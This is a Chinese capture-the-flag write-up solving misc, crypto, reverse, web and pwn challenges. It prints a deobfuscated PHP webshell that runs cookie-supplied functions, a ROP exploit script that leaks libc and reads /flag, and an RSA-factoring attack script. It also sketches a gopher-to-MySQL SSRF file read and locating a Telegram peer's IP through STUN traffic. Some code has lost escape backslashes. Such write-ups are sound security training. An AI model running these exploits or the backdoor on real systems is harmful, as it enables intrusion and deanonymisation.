Misc-tele
Telegram使用了STUN协议流量。STUN(NAT 会话穿越工具)是一种标准化协议,用于帮助位于 NAT(网络地址转换)之后的设备确定自己的外部 IP 地址以及网关所使用的 NAT 类型,本质上是让设备得知自己的公网 IP 并确定哪些端口可用于外出连接。STUN 消息中的关键属性之一是 XOR-MAPPED-ADDRESS,它携带 STUN 服务器所观察到的对端公网 IP 地址(地址经 XOR 混淆,Wireshark 会自动还原,所以下面过滤用的 stun.att.ipv4-xord 字段显示的就是明文)。因此数据包的方向决定了这个属性里是谁的 IP:如果该帧是发给我的,XOR-MAPPED-ADDRESS 显示的是我的 IP;如果是我发出的,显示的则是对话者的 IP。
过滤规则:
stun or stun.att.username or stun.att.ipv4-xord or stun.att.ipv4
检查数据包并在属性部分中查找 XOR-MAPPED-ADDRESS
提取到如下地址
171.88.96.93
171.88.96.218
91.108.9.41
逐个IP尝试提交
最后确定171.88.96.93为目标IP
Misc-parser
将脚本提取出来,反混淆。
# original php 有许多十六进制的字节。
# python转换一下。 这里就不贴了。
p1_hex_bytes.py
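# UTF-8 encoding of U+FFFD (the replacement character); the obfuscated
# identifiers in 1.php are mostly runs of it with a few other bytes mixed in.
U = b'\xef\xbf\xbd'

# Raw identifier bytes, in the order they are renamed to v1..v13.
# NOTE(review): the rendered listing had lost the backslashes of these escapes
# ('xd8xae...' for '\xd8\xae...'); they are restored here.
IDENT_BYTES = [
    b'\xd8\xae' + U * 4 + b'\xcd\xb1' + U * 8,                                   # v1
    b'\xca\xaa' + U * 5 + b'\xd1\x80' + U * 6,                                   # v2
    U * 2 + b'\xc5\xa8\xdc\xb9' + U + b'\xc8\x8f' + U * 2 + b'\xc8\xb5' + U,      # v3
    U * 13 + b'\xe3\xa1\xb3',                                                    # v4
    U * 3 + b'\xdc\xa5' + U + b'\xd2\x93' + U * 4 + b'\xc9\x9d' + U,              # v5
    U * 10 + b'\xd7\xbb' + U * 4,                                                # v6
    U * 3 + b'\xe5\x84\x8e' + U + b'\xd5\xb8' + U + b'\xd6\xbf' + U * 2,          # v7
    U * 2 + b'\xe0\xad\x8f' + U * 3 + b'\xd5\xa5\xc4\x86' + U * 3,                # v8
    U + b'\xe5\xb3\xb6' + U * 2 + b'\xce\x92' + U * 6,                            # v9
    U * 6 + b'\xcf\x8e\xdf\xae' + U * 5,                                         # v10
    U + b'\xce\x89' + U + b'\xd6\x8f' + U * 4 + b'\xd3\xb1\xeb\xbb\xb2' + U,       # v11
    U * 3 + b'\xd1\xad' + U + b'\xcc\xb3' + U + b'\xc3\xa2' + U * 3 + b'\xd9\xbc', # v12
    U * 10 + b'\xd0\xb9' + U * 3,                                                # v13
]


def rename_identifiers(con):
    """Replace every raw identifier from IDENT_BYTES in *con* with b'v1'..b'v13'.

    Replacements are applied in table order, exactly like the original chain
    of replace() calls. Returns the rewritten bytes; an input with no match
    (including b'') is returned unchanged.
    """
    for number, raw in enumerate(IDENT_BYTES, start=1):
        con = con.replace(raw, b'v%d' % number)
    return con


if __name__ == '__main__':
    with open('1.php', 'rb') as f:
        con = f.read()
    print(rename_identifiers(con))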
得到 2.php:
<?php
str_rot13(substr('kofvamreebe_ercbegvat', 6, 15))(E_ALL ^ E_NOTICE);
$v1 = str_rot13(substr('etsjuonfr64_qrpbqr', 5, 13))(substr('vxMDgwNjdTZWM=', 2, 12));
function xorDecrypt($v2, $v3) { $v2 = str_rot13(substr('xothonfr64_qrpbqr', 4, 13))($v2);
$v4 = str_rot13(substr('jtonfr64_qrpbqr', 2, 13))('');
$v5 = str_rot13(substr('efgeyra', 1, 6))($v3);
for ($v6 = 0;
$v6 < str_rot13(substr('jtefgeyra', 3, 6))($v2);
$v6++) { $v7 = $v3[$v6 % $v5];
$v8 = str_rot13(substr('ybeq', 1, 3))($v2[$v6]) - $v6 % 3;
$v8 = ($v8 ^ str_rot13(substr('rgxamfbeq', 6, 3))($v7)) % 256;
$v4 .= str_rot13(substr('hlvqapue', 5, 3))($v8);
} return $v4;
}
class A {
public function __construct($v9, $v10) {
$v11 = str_rot13(substr('xjyvwrkbeQrpelcg', 6, 10))($v9, str_rot13(substr('ncchbaonfr64_qrpbqr', 6, 13))(substr('jhpmqR0ZDVEYyMDI0', 5, 12)));
$v12 = str_rot13(substr('gyfjiekbeQrpelcg', 6, 10))($v10, str_rot13(substr('ascbqonfr64_qrpbqr', 5, 13))(substr('sgxsemREFTQ1RG', 6, 8)));
str_rot13(substr('hgwqkmcevag_e', 6, 7))(str_rot13(substr('kiokxonfr64_rapbqr', 5, 13))
(str_rot13(substr('cfdnkbeQrpelcg', 4, 10))(str_rot13(substr('jmonfr64_rapbqr', 2, 13))(str_rot13(substr('yndhsupnyy_hfre_shap', 6, 14))($v11, $v12)), str_rot13(substr('ukifonfr64_qrpbqr', 4, 13))(substr('hrwcuhR0VUTVlGTEFH', 6, 12)))));
}
}
if ($_POST[str_rot13(substr('vqewegonfr64_qrpbqr', 6, 13))(substr('gucGFzcw==', 2, 8))] === str_rot13(substr('fffun1', 2, 4))($v1)) {
$v13 = new A($_COOKIE[str_rot13(substr('wonfr64_qrpbqr', 1, 13))(substr('mugeXM=', 3, 4))], $_COOKIE[str_rot13(substr('lreuonfr64_qrpbqr', 4, 13))(substr('xfkkcWQ=', 4, 4))]);
}
echo str_rot13(substr('bxgonfr64_qrpbqr', 3, 13))(substr('hjnc3VjY2Vzc18x', 3, 12));
将substr执行一下:
import codecs
import re
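# NOTE(review): the rendered listing had lost the backslashes of this pattern
# (the parentheses and quotes must be escaped); restored here.
_SUBSTR_CALL = re.compile(r"substr\('([^']+)', (\d+), (\d+)\)")


def _slice_literal(match):
    """Evaluate one matched substr('literal', start, length) call.

    PHP substr with non-negative arguments is the slice
    literal[start:start + length]; the result is returned re-quoted so it
    stays a PHP string literal.
    """
    literal = match.group(1)
    start, length = int(match.group(2)), int(match.group(3))
    return "'" + literal[start:start + length] + "'"


def expand_substr(con):
    """Replace every substr('literal', start, length) call in the PHP source
    text *con* with the quoted result of the call.

    Only single-quoted literals with plain integer arguments are matched;
    everything else is left untouched, so an input without such calls is
    returned unchanged.
    """
    return _SUBSTR_CALL.sub(_slice_literal, con)


if __name__ == '__main__':
    with open('2.php', 'r') as f:
        con = f.read()
    print(expand_substr(con))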
得到3.php
<?php
str_rot13('reebe_ercbegvat')(E_ALL ^ E_NOTICE);
$v1 = str_rot13('onfr64_qrpbqr')('MDgwNjdTZWM=');
function xorDecrypt($v2, $v3) { $v2 = str_rot13('onfr64_qrpbqr')($v2);
$v4 = str_rot13('onfr64_qrpbqr')('');
$v5 = str_rot13('fgeyra')($v3);
for ($v6 = 0;
$v6 < str_rot13('fgeyra')($v2);
$v6++) { $v7 = $v3[$v6 % $v5];
$v8 = str_rot13('beq')($v2[$v6]) - $v6 % 3;
$v8 = ($v8 ^ str_rot13('beq')($v7)) % 256;
$v4 .= str_rot13('pue')($v8);
} return $v4;
}
class A {
public function __construct($v9, $v10) {
$v11 = str_rot13('kbeQrpelcg')($v9, str_rot13('onfr64_qrpbqr')('R0ZDVEYyMDI0'));
$v12 = str_rot13('kbeQrpelcg')($v10, str_rot13('onfr64_qrpbqr')('REFTQ1RG'));
str_rot13('cevag_e')(str_rot13('onfr64_rapbqr')
(str_rot13('kbeQrpelcg')(str_rot13('onfr64_rapbqr')(str_rot13('pnyy_hfre_shap')($v11, $v12)), str_rot13('onfr64_qrpbqr')('R0VUTVlGTEFH'))));
}
}
if ($_POST[str_rot13('onfr64_qrpbqr')('cGFzcw==')] === str_rot13('fun1')($v1)) {
$v13 = new A($_COOKIE[str_rot13('onfr64_qrpbqr')('eXM=')], $_COOKIE[str_rot13('onfr64_qrpbqr')('cWQ=')]);
}
echo str_rot13('onfr64_qrpbqr')('c3VjY2Vzc18x');
再将str_rot13执行一下:
import codecs
import re
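# NOTE(review): the rendered listing had lost the backslashes of this pattern
# (the parentheses and quotes must be escaped); restored here.
_ROT13_CALL = re.compile(r"str_rot13\('([^']+)'\)")


def _rot13_literal(match):
    """Return the ROT13 of the matched literal, unquoted: the calls being
    expanded all produce function names that are then invoked directly."""
    return codecs.encode(match.group(1), 'rot_13')


def expand_rot13(con):
    """Replace every str_rot13('literal') call in the PHP source text *con*
    with the decoded literal (no quotes around it).

    Only single-quoted literals are matched; an input without such calls is
    returned unchanged.
    """
    return _ROT13_CALL.sub(_rot13_literal, con)


if __name__ == '__main__':
    with open('3.php', 'r') as f:
        con = f.read()
    print(expand_rot13(con))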
得到4.php:
<?php
error_reporting(E_ALL ^ E_NOTICE);
$v1 = base64_decode('MDgwNjdTZWM=');
function xorDecrypt($v2, $v3) { $v2 = base64_decode($v2);
$v4 = base64_decode('');
$v5 = strlen($v3);
for ($v6 = 0;
$v6 < strlen($v2);
$v6++) { $v7 = $v3[$v6 % $v5];
$v8 = ord($v2[$v6]) - $v6 % 3;
$v8 = ($v8 ^ ord($v7)) % 256;
$v4 .= chr($v8);
} return $v4;
}
class A {
public function __construct($v9, $v10) {
$v11 = xorDecrypt($v9, base64_decode('R0ZDVEYyMDI0'));
$v12 = xorDecrypt($v10, base64_decode('REFTQ1RG'));
print_r(base64_encode
(xorDecrypt(base64_encode(call_user_func($v11, $v12)), base64_decode('R0VUTVlGTEFH'))));
}
}
if ($_POST[base64_decode('cGFzcw==')] === sha1($v1)) {
$v13 = new A($_COOKIE[base64_decode('eXM=')], $_COOKIE[base64_decode('cWQ=')]);
}
echo base64_decode('c3VjY2Vzc18x');
再将 base64_decode 也执行一下,得到 5.php:
<?php
// Notices are suppressed; everything else is reported as usual.
error_reporting(E_ALL ^ E_NOTICE);
// Plaintext password; the POST check further down compares against its sha1.
$v1 = '08067Sec';
/**
 * Decode $v2 from base64 and transform it byte by byte under the key $v3.
 *
 * For byte i the result is chr(((ord(byte) - i % 3) ^ ord(key[i % strlen(key)])) % 256).
 * PHP's % keeps the sign of its left operand, so when ord(byte) < i % 3 the
 * intermediate value is negative and chr() is left to reduce it into 0..255.
 *
 * @param string $v2 base64-encoded input
 * @param string $v3 key, cycled over the input
 * @return string the transformed bytes
 */
function xorDecrypt($v2, $v3) {
    $v2 = base64_decode($v2);
    $v4 = base64_decode('');   // an empty string used as the accumulator
    $v5 = strlen($v3);
    for ($v6 = 0;$v6 < strlen($v2); $v6++) {
        $v7 = $v3[$v6 % $v5];
        $v8 = ord($v2[$v6]) - $v6 % 3;
        $v8 = ($v8 ^ ord($v7)) % 256;
        $v4 .= chr($v8);
    }
    return $v4;
}
/**
 * Runs entirely in the constructor: decodes the two cookie-supplied values
 * with fixed keys, invokes $v11 as a function with $v12 as its argument, and
 * prints the result wrapped with xorDecrypt (key 'GETMYFLAG') and base64.
 *
 * Both the callable name and its argument come from request cookies, so this
 * is a backdoor: any PHP function can be called with an attacker-chosen string.
 */
class A {
    public function __construct($v9, $v10) {
        $v11 = xorDecrypt($v9, 'GFCTF2024');   // function name, from cookie 'ys'
        $v12 = xorDecrypt($v10, 'DASCTF');     // its argument, from cookie 'qd'
        print_r(base64_encode(xorDecrypt(base64_encode(call_user_func($v11, $v12)), 'GETMYFLAG')));
    }
}
// Gate: POST field 'pass' must equal sha1('08067Sec'); only then are the two
// cookies handed to A's constructor, which executes them. 'success_1' is
// echoed either way, so the response body alone does not show whether the
// gate was passed.
if ($_POST['pass'] === sha1($v1)) { # 08067Sec --> c0ba7f1fcaeb228316d7bd4c89f37b12baf7cbe8
    $v13 = new A($_COOKIE['ys'], $_COOKIE['qd']);
}
echo 'success_1';
发现最后一个HTTP流执行的命令就是cat /flag:
所以,对其返回的结果进行解密:
import base64
from Crypto.Util.number import *
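c1 = "AwUFDgoCNzlpMhtmPz0bPCYpF3YkPms2Ey11NDZlPyVO"
key = 'GETMYFLAG'


def undo_xor_decrypt(cipher_b64, key):
    """Invert the PHP xorDecrypt() wrapping applied to the command output.

    xorDecrypt produced byte i as ((x - i % 3) ^ key[i % len(key)]) % 256, so
    here each decoded byte is XOR-ed with the same key byte and i % 3 is added
    back. The addition is reduced modulo 256 so the inverse stays exact for
    bytes that wrapped on the PHP side; the original listing omitted this.

    Returns the recovered text as a str of code points 0..255.
    """
    data = base64.b64decode(cipher_b64)
    out = []
    for i, b in enumerate(data):
        b1 = (b ^ ord(key[i % len(key)])) % 256
        out.append(chr((b1 + i % 3) % 256))
    return ''.join(out)


print(undo_xor_decrypt(c1, key), end='')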
得到flag:
DASCTF{y0u_4re_phpP4rs3r_m4st3r}
Misc-Badmes
# -*- coding: utf-8 -*-
from pwn import *
import subprocess
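sh = remote("4.216.46.225", 2333)
context.log_level = 'debug'

# The listing had "judgeSpamMessage.py " with a trailing space, which the
# interpreter would not find as a file on most platforms; fixed here.
CLASSIFIER_CMD = ["python", "judgeSpamMessage.py", "-c", "svm", "-i", "input.txt", "-o", "result.txt"]


def classify_round(sh):
    """Answer one batch: read the server's messages, run the local SVM
    classifier over them and send its output back.

    The batch is written to input.txt and the classifier is expected to write
    result.txt. On a non-zero exit status the classifier's stderr is printed
    and nothing is sent (the original listing silently sent nothing).
    """
    data = sh.recv().decode()
    print(data)
    with open("input.txt", "w", encoding="utf-8") as file:
        file.write(data)
    # subprocess.run() waits for the child, so the sleep(1) that followed
    # communicate() in the original listing added nothing and is dropped.
    proc = subprocess.run(CLASSIFIER_CMD, capture_output=True)
    if proc.returncode != 0:
        print(proc.stderr.decode(errors="replace"))
        return
    with open("result.txt", "r", encoding="utf-8") as file:
        sh.send(file.read())


classify_round(sh)
for _ in range(240):
    # The line the server sends before each further batch (called `point`
    # in the original listing); printed as-is.
    print(sh.recvline().decode())
    classify_round(sh)
sh.interactive()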
数据集可能给错了:没有 label 就无法训练,于是找了一个开源的、已经训练好的支持向量机(SVM)模型来做。
需要确保sklearn的版本低于0.21
Crypto-The Mystery of Math
from Crypto.Util.number import *
from sympy import nextprime
from pwn import *
#context.log_level = 'debug'
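# Pollard's p-1 precomputation: t is divisible by p_i^150 for each of the
# first twenty primes, so for any prime factor p of n whose p-1 is built from
# those primes, 2^t ≡ 1 (mod p) and gcd(2^t - 1, n) exposes p.
# (Defensive takeaway: an RSA prime whose p-1 is smooth makes the key
# recoverable this way.)
t = 1
a = 2
for _ in range(20):
    t *= a ** 150
    a = nextprime(a)

# Keep reconnecting until the service hands out a modulus that factors this way.
while True:
    sh = remote("node5.buuoj.cn", 28758)
    sh.sendline("p".encode('utf-8'))
    sh.recvuntil(b"random_pro: ")
    random_pro = sh.recvline().decode('utf-8')   # consumed to advance the stream; unused
    sh.recvuntil(b"c: ")
    c = int(sh.recvline().strip().decode())
    sh.recvuntil(b"n: ")
    n = int(sh.recvline().strip().decode())
    sh.recvuntil(b"tip: ")
    tip = int(sh.recvline().strip().decode())    # likewise consumed, unused
    # One gcd instead of three; a proper factor lies strictly between 1 and n.
    g = GCD(pow(2, t, n) - 1, n)
    if 1 < g < n:
        p = g
        q = n // p
        phi = (p - 1) * (q - 1)
        d = inverse(65537, phi)   # the service's public exponent, per the original listing
        print(long_to_bytes(pow(c, d, n)))
        sh.close()
        break
    sh.close()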
Re-ezVM
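arr = "2x*{*{|}qdz,{}d(}q,dxx}zd(z}px7f(z+~}yy4"


def xor_decode(data, key=0x49):
    """Return *data* with every character XOR-ed against the single-byte *key*.

    XOR is its own inverse, so applying it twice with the same key yields the
    input again. An empty string decodes to an empty string.
    """
    return ''.join(chr(ord(ch) ^ key) for ch in data)


# The VM applies a fixed single-byte XOR (0x49); the decoded text starts at
# the '{' and lacks the flag prefix, which the write-up adds by hand.
print(xor_decode(arr), end="")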
加个flag头
Re-unwind
main函数里面有一次XXtea
另外一个函数调用了两次xtea函数
所以是一次xxtea两次xtea,直接套用解密函数
from ctypes import *
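a = [0x87AAA7C1, 0x857321B6, 0x0E71D28C, 0xCADF39F2, 0x58EFCA14, 0xD7E7D9D8, 0xF29F5C5D, 0x5F5ED45E]
k = [0x00000044, 0x00000041, 0x00000053, 0x00000021]

_MASK32 = 0xFFFFFFFF
# The binary's delta is the 32-bit two's complement of the textbook 0x9E3779B9,
# so "sum += delta" below is the same as the usual "sum -= 0x9E3779B9".
XTEA_DELTA = 1640531527


def xtea_decrypt(words, key, rounds=36, delta=XTEA_DELTA):
    """Decrypt *words* (a flat list of 32-bit ints taken as consecutive
    (v0, v1) pairs) with XTEA under the four-word *key*.

    rounds and delta are parameters so the same routine covers other builds
    of the cipher; the defaults match the challenge binary. Returns a new
    list and leaves *words* untouched; an empty list decrypts to an empty
    list. Arithmetic is done on plain ints masked to 32 bits, which is what
    the c_uint32 cells of the original listing did.
    """
    out = []
    for j in range(0, len(words), 2):
        v0, v1 = words[j], words[j + 1]
        total = (-delta * rounds) & _MASK32
        for _ in range(rounds):
            v1 = (v1 - ((key[(total >> 11) & 3] + total) ^ (v0 + ((v0 >> 5) ^ (v0 << 4))))) & _MASK32
            total = (total + delta) & _MASK32
            v0 = (v0 - ((key[total & 3] + total) ^ (v1 + ((v1 >> 5) ^ (v1 << 4))))) & _MASK32
        out.extend((v0, v1))
    return out


# The binary runs XTEA twice over the same buffer (the original listing
# repeated the whole loop verbatim), so undo it twice.
a = xtea_decrypt(xtea_decrypt(a, k), k)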
from ctypes import *
def MX(z, y, sum1, k, p, e):
    """One XXTEA mixing term, truncated to 32 bits.

    z, y, sum1 and e are c_uint32 cells (the neighbouring words, the running
    sum and the key selector); k is the four-word key and p the word index.
    Returns the term as a c_uint32.
    """
    zv, yv, sv = z.value, y.value, sum1.value
    shifted = ((zv >> 5) ^ (yv << 2)) + ((yv >> 3) ^ (zv << 4))
    keyed = (sv ^ yv) + (k[(p & 3) ^ e.value] ^ zv)
    return c_uint32(shifted ^ keyed)
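def btea(v, k, n, delta):
    """XXTEA (Corrected Block TEA) over the 32-bit word list *v* with the
    four-word key *k*, in place.

    n > 1 encrypts the first n words; n < 0 decrypts the first -n words
    (the else branch negates n, so |n| must be at least 2). delta is the
    round constant (0x9e3779b9 in the caller). Every intermediate result is
    truncated to 32 bits through c_uint32, as in the reference C code.
    Returns v.

    NOTE(review): the rendered listing had lost the [p] / [p+1] subscripts in
    both inner loops; they are restored here from the reference algorithm.
    """
    if n > 1:
        sum1 = c_uint32(0)
        z = c_uint32(v[n - 1])
        rounds = 6 + 52 // n
        e = c_uint32(0)
        while rounds > 0:
            sum1.value += delta
            e.value = (sum1.value >> 2) & 3
            for p in range(n - 1):
                y = c_uint32(v[p + 1])
                v[p] = c_uint32(v[p] + MX(z, y, sum1, k, p, e).value).value
                z.value = v[p]
            y = c_uint32(v[0])
            v[n - 1] = c_uint32(v[n - 1] + MX(z, y, sum1, k, n - 1, e).value).value
            z.value = v[n - 1]
            rounds -= 1
    else:
        sum1 = c_uint32(0)
        n = -n
        rounds = 6 + 52 // n
        sum1.value = rounds * delta   # wraps to 32 bits on assignment
        y = c_uint32(v[0])
        e = c_uint32(0)
        while rounds > 0:
            e.value = (sum1.value >> 2) & 3
            for p in range(n - 1, 0, -1):
                z = c_uint32(v[p - 1])
                v[p] = c_uint32(v[p] - MX(z, y, sum1, k, p, e).value).value
                y.value = v[p]
            z = c_uint32(v[n - 1])
            v[0] = c_uint32(v[0] - MX(z, y, sum1, k, 0, e).value).value
            y.value = v[0]
            sum1.value -= delta
            rounds -= 1
    return v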
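if __name__ == '__main__':
    k = [0x00000044, 0x00000041, 0x00000053, 0x00000021]
    delta = 0x9e3779b9
    n = len(a)
    # Negative n selects the decrypt branch of btea.
    res = btea(a, k, -n, delta)
    print("解密后数据:", res)
    # Each word holds four flag bytes in little-endian order. The original
    # listing used libnum.n2s(word)[::-1], which gives the same bytes for
    # words whose top byte is non-zero; to_bytes needs no third-party module.
    flag = ''.join(word.to_bytes(4, 'little').decode() for word in res)
    print(flag)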
flag:DASCTF{Gr3@t!Y0u_have_50lv3d_1T}
Re-prese
把temp加密表调出来之后直接用密文做下标,得到的结果需要大小写转换
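arr = [0xE2, 0xE3, 0xE0, 0xE1, 0xE6, 0xE7, 0xE4, 0xE5, 0xEA, 0xEB, 0xE8, 0xE9, 0xEE, 0xEF, 0xEC, 0xED, 0xF2, 0xF3, 0xF0, 0xF1, 0xF6, 0xF7, 0xF4, 0xF5, 0xFA, 0xFB, 0xF8, 0xF9, 0xFE, 0xFF, 0xFC, 0xFD, 0xC2, 0xC3, 0xC0, 0xC1, 0xC6, 0xC7, 0xC4, 0xC5, 0xCA, 0xCB, 0xC8, 0xC9, 0xCE, 0xCF, 0xCC, 0xCD, 0xD2, 0xD3, 0xD0, 0xD1, 0xD6, 0xD7, 0xD4, 0xD5, 0xDA, 0xDB, 0xD8, 0xD9, 0xDE, 0xDF, 0xDC, 0xDD, 0xA2, 0xA3, 0xA0, 0xA1, 0xA6, 0xA7, 0xA4, 0xA5, 0xAA, 0xAB, 0xA8, 0xA9, 0xAE, 0xAF, 0xAC, 0xAD, 0xB2, 0xB3, 0xB0, 0xB1, 0xB6, 0xB7, 0xB4, 0xB5, 0xBA, 0xBB, 0xB8, 0xB9, 0xBE, 0xBF, 0xBC, 0xBD, 0x82, 0x83, 0x80, 0x81, 0x86, 0x87, 0x84, 0x85, 0x8A, 0x8B, 0x88, 0x89, 0x8E, 0x8F, 0x8C, 0x8D, 0x92, 0x93, 0x90, 0x91, 0x96, 0x97, 0x94, 0x95, 0x9A, 0x9B, 0x98, 0x99, 0x9E, 0x9F, 0x9C, 0x9D, 0x62, 0x63, 0x60, 0x61, 0x66, 0x67, 0x64, 0x65, 0x6A, 0x6B, 0x68, 0x69, 0x6E, 0x6F, 0x6C, 0x6D, 0x72, 0x73, 0x70, 0x71, 0x76, 0x77, 0x74, 0x75, 0x7A, 0x7B, 0x78, 0x79, 0x7E, 0x7F, 0x7C, 0x7D, 0x42, 0x43, 0x40, 0x41, 0x46, 0x47, 0x44, 0x45, 0x4A, 0x4B, 0x48, 0x49, 0x4E, 0x4F, 0x4C, 0x4D, 0x52, 0x53, 0x50, 0x51, 0x56, 0x57, 0x54, 0x55, 0x5A, 0x5B, 0x58, 0x59, 0x5E, 0x5F, 0x5C, 0x5D, 0x22, 0x23, 0x20, 0x21, 0x26, 0x27, 0x24, 0x25, 0x2A, 0x2B, 0x28, 0x29, 0x2E, 0x2F, 0x2C, 0x2D, 0x32, 0x33, 0x30, 0x31, 0x36, 0x37, 0x34, 0x35, 0x3A, 0x3B, 0x38, 0x39, 0x3E, 0x3F, 0x3C, 0x3D, 0x02, 0x03, 0x00, 0x01, 0x06, 0x07, 0x04, 0x05, 0x0A, 0x0B, 0x08, 0x09, 0x0E, 0x0F, 0x0C, 0x0D, 0x12, 0x13, 0x10, 0x11, 0x16, 0x17, 0x14, 0x15, 0x1A, 0x1B, 0x18, 0x19, 0x1E, 0x1F, 0x1C, 0x1D]
crypto = [0x86, 0x83, 0x91, 0x81, 0x96, 0x84, 0xB9, 0xA5, 0xAD, 0xAD,
          0xA6, 0x9D, 0xB6, 0xAA, 0xA7, 0x9D, 0xB0, 0xA7, 0x9D, 0xAB,
          0xB1, 0x9D, 0xA7, 0xA3, 0xB1, 0xBB, 0xAA, 0xAA, 0xAA, 0xAA,
          0xBF]


def table_decode(cipher, table=None):
    """Look each ciphertext byte up in *table* (default: the dumped ``arr``)
    and return the resulting characters as a string.

    An empty cipher yields an empty string. Every entry of the dumped table
    equals index ^ 0xE2, so this is a single-byte XOR in disguise.
    """
    if table is None:
        table = arr
    return ''.join(chr(table[b]) for b in cipher)


def flip_case_bit(text):
    """Toggle bit 0x20 of every character.

    This is the "case conversion" the write-up applies by hand: it swaps
    ASCII letter case and also maps '[' to '{' and DEL to '_', which the raw
    lookup produces where the flag has '{' and '_'.
    """
    return ''.join(chr(ord(ch) ^ 0x20) for ch in text)


raw = table_decode(crypto)
print(raw, end="")
print()
print(flip_case_bit(raw))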
flag:DASCTF{good_the_re_is_easyhhhh}
Web-cool_index
Web-EasySignin
update.php 任意修改密码,修改admin
然后gopher打mysql,直接select load_file('/flag')即可
Pwn-dynamic_but_static
from pwn import *
import sys
remote_addr = ["node5.buuoj.cn",25763]
libc = ELF('./libc.so.6')
elf = ELF('./pwn')
# Target selection from argv: no argument runs the local patched binary with
# debug logging; an argument containing 'r' connects to remote_addr instead,
# and one containing 'n' leaves debug logging off.
if len(sys.argv) == 1:
    context.log_level="debug"
    #p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
    #p = process(["qemu-aarch64", "-L", ".", "./stack"])
    p = process("./pwn_patched")
    context(arch='amd64', os='linux')
    context.terminal = ['tmux', 'splitw', '-h']
if len(sys.argv) == 2 :
    if 'r' in sys.argv[1]:
        p = remote(remote_addr[0],remote_addr[1])
    if 'n' not in sys.argv[1]:
        context.log_level="debug"
    context(arch = 'amd64', os = 'linux')
# Short aliases for the pwntools tube helpers used below.
r = lambda : p.recv()
rl = lambda : p.recvline()
rc = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
shell = lambda : p.interactive()
pr = lambda name,x : log.info(name+':'+hex(x))
# Set to 1 to let debug() attach gdb.
DEBUG = 1
def debug(bp = None):
    """Attach gdb to the live process when DEBUG is 1.

    bp: optional gdb command script (for example breakpoint lines) passed
    through to gdb.attach; when omitted gdb is attached without one.
    Does nothing when DEBUG is not 1.
    """
    if DEBUG == 1:
        if bp != None:
            gdb.attach(p, bp)
        else:
            gdb.attach(p)
#debug('''
#3 b *0x40143d
#''')
# Challenge-specific constants: addresses inside ./pwn and offsets into the
# bundled libc.so.6. They are only valid for those exact files.
pop_rdi = 0x401381
main = 0x401386
bss_addr = 0x404800
leave_ret = 0x401349
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
payload = b'a' * (0x20) + p64(0) + b'a' * (0x10) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
s(payload)
libc.address = u64(ru(b'x7f')[-6:].ljust(8, b'x00')) - libc.sym['puts']
pr('libc.address', libc.address)
pop_rsi = libc.address + 0x2be51
pop_rdx = libc.address + 0x796a2
pop_rax = libc.address + 0x45eb0
xor_rax = libc.address + 0xbaaf9
syscall_ret = libc.address + 0x91316
o = libc.sym['open']
r = libc.sym['read'] + 4
w = libc.sym['write']
payload = b'a' * (0x20) + p64(0) + p64(bss_addr) * 2 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss_addr) + p64(pop_rdx) + p64(0x200) + p64(xor_rax) + p64(syscall_ret) + p64(leave_ret) + p64(0)
pause()
s(payload)
payload = b'/flagx00x00x00' + flat(pop_rdi, bss_addr, pop_rsi, 0, pop_rax, 2, syscall_ret, pop_rdi, 3, pop_rsi, bss_addr + 0x120, pop_rdx, 0x100, pop_rax, 0, syscall_ret, pop_rdi, 1, pop_rsi, bss_addr + 0x120, pop_rdx, 0x100, pop_rax, 1, syscall_ret)
pause()
s(payload)
shell()